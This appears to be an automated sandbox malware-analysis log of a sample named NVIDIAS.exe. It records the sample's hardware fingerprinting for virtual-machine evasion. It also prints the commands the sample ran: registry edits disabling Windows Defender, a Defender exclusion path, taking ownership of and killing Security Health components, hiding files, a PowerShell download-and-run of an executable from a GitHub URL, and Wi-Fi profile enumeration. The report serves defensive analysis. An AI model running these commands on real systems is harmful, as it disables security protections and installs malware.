    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\taskkill.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX

    Malware Analysis System Evasion

    barindex
    Source: C:\ProgramData\QQQ\NVIDIAS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Speed FROM Win32_PhysicalMemory
    Source: C:\ProgramData\QQQ\NVIDIAS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_CacheMemory
    Source: C:\ProgramData\QQQ\NVIDIAS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from CIM_Memory
    Source: C:\ProgramData\QQQ\NVIDIAS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
    Source: C:\ProgramData\QQQ\NVIDIAS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_PointingDevice
    Source: C:\ProgramData\QQQ\NVIDIAS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT EstimatedChargeRemaining, BatteryStatus FROM Win32_Battery
    Source: C:\ProgramData\QQQ\NVIDIAS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
    Source: C:\ProgramData\QQQ\NVIDIAS.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
    Source: C:\ProgramData\QQQ\NVIDIAS.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
    Source: C:\ProgramData\QQQ\NVIDIAS.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
    Source: C:\ProgramData\QQQ\NVIDIAS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Model, Size FROM Win32_DiskDrive
    Source: C:\ProgramData\QQQ\NVIDIAS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, MACAddress, Speed FROM Win32_NetworkAdapter WHERE MACAddress IS NOT NULL
    Source: C:\ProgramData\QQQ\NVIDIAS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Description, MACAddress, IPEnabled FROM Win32_NetworkAdapterConfiguration WHERE IPEnabled = TRUE
    Source: C:\ProgramData\QQQ\NVIDIAS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Speed FROM Win32_PhysicalMemory
    Source: C:\ProgramData\QQQ\NVIDIAS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Capacity FROM Win32_PhysicalMemory
    Source: C:\ProgramData\QQQ\NVIDIAS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, Default FROM Win32_Printer
    Source: C:\ProgramData\QQQ\NVIDIAS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT DeviceID, FileSystem, FreeSpace, Size FROM Win32_LogicalDisk WHERE DriveType = 3
    Source: C:\ProgramData\QQQ\NVIDIAS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_SoundDevice
    Source: C:\ProgramData\QQQ\NVIDIAS.exeMemory allocated: 33A0000 memory reserve | memory write watchJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeMemory allocated: 3550000 memory reserve | memory write watchJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeMemory allocated: 5550000 memory reserve | memory write watchJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeMemory allocated: 5A80000 memory reserve | memory write watchJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeMemory allocated: 7A80000 memory reserve | memory write watchJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeMemory allocated: 7CC0000 memory reserve | memory write watchJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeMemory allocated: 9CC0000 memory reserve | memory write watchJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9926Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9866Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9911Jump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeWindow / User API: threadDelayed 9783Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7440Thread sleep count: 9926 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1552Thread sleep count: 9866 > 30Jump to behavior
    Source: C:\Windows\System32\timeout.exe TID: 7440Thread sleep count: 87 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7956Thread sleep count: 9911 > 30Jump to behavior
    Source: C:\Windows\System32\svchost.exe TID: 2480Thread sleep time: -30000s >= -30000s
    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
    Source: C:\ProgramData\QQQ\NVIDIAS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer, Product FROM Win32_BaseBoard
    Source: C:\ProgramData\QQQ\NVIDIAS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SMBIOSBIOSVersion FROM Win32_BIOS
    Source: C:\ProgramData\QQQ\NVIDIAS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Product, Manufacturer, SerialNumber FROM Win32_BaseBoard
    Source: C:\ProgramData\QQQ\NVIDIAS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer, SMBIOSBIOSVersion, ReleaseDate FROM Win32_BIOS
    Source: C:\ProgramData\QQQ\NVIDIAS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
    Source: C:\ProgramData\QQQ\NVIDIAS.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
    Source: C:\ProgramData\QQQ\NVIDIAS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, NumberOfCores, MaxClockSpeed FROM Win32_Processor
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\ProgramData\QQQ\NVIDIAS.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
    Source: svchost.exe, 0000001F.00000002.2121016007.0000020FFFE87000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.2119395170.0000020FFEC2A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.39.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: NVIDIAS.exe, 00000015.00000002.1209998915.00000000017D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll))
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeProcess token adjusted: Debug
    Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
    Source: C:\ProgramData\QQQ\NVIDIAS.exeMemory allocated: page read and write | page guardJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData\QQQ
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData\QQQJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cacls.exe "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -window hidden -command ""Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableBehaviorMonitoring" /t REG_DWORD /d 1Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableOnAccessProtection" /t REG_DWORD /d 1Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /f /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d 1Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /f /v "DisableAntiSpyware" /t REG_DWORD /d 1Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v "SecurityHealth"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f "C:\Windows\System32\SecurityHealthService.exe"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls "C:\Windows\System32\SecurityHealthService.exe" /grant:r "computer\user":F /cJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\takeown.exe takeown /f "C:\Windows\System32\SecurityHealthSystray.exe"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls "C:\Windows\System32\SecurityHealthSystray.exe" /grant:r "computer\user":F /cJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM SecurityHealthSystray.exe /FJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData\QQQJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe timeout.exe /t 10Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h "QQQ" /s /dJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest 'https://github.com/pr0niums/Repo/raw/refs/heads/main/NVIDIAS.exe' -OutFile 'NVIDIAS.exe'"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\QQQ\NVIDIAS.exe NVIDIAS.exeJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h "C:\ProgramData\QQQ\NVIDIAS.exe" /s /dJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c tasklistJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd" /C chcp 65001 && netsh wlan show profiles | findstr AllJump to behavior
    Source: C:\ProgramData\QQQ\NVIDIAS.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Local\Temp\tmp6F58.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp6F58.tmp.batJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 716
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /Nobreak
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM SecurityHealthSystray.exe /FJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /IM 716
    Source: C:\ProgramData\QQQ\NVIDIAS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductIdJump to behavior
    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
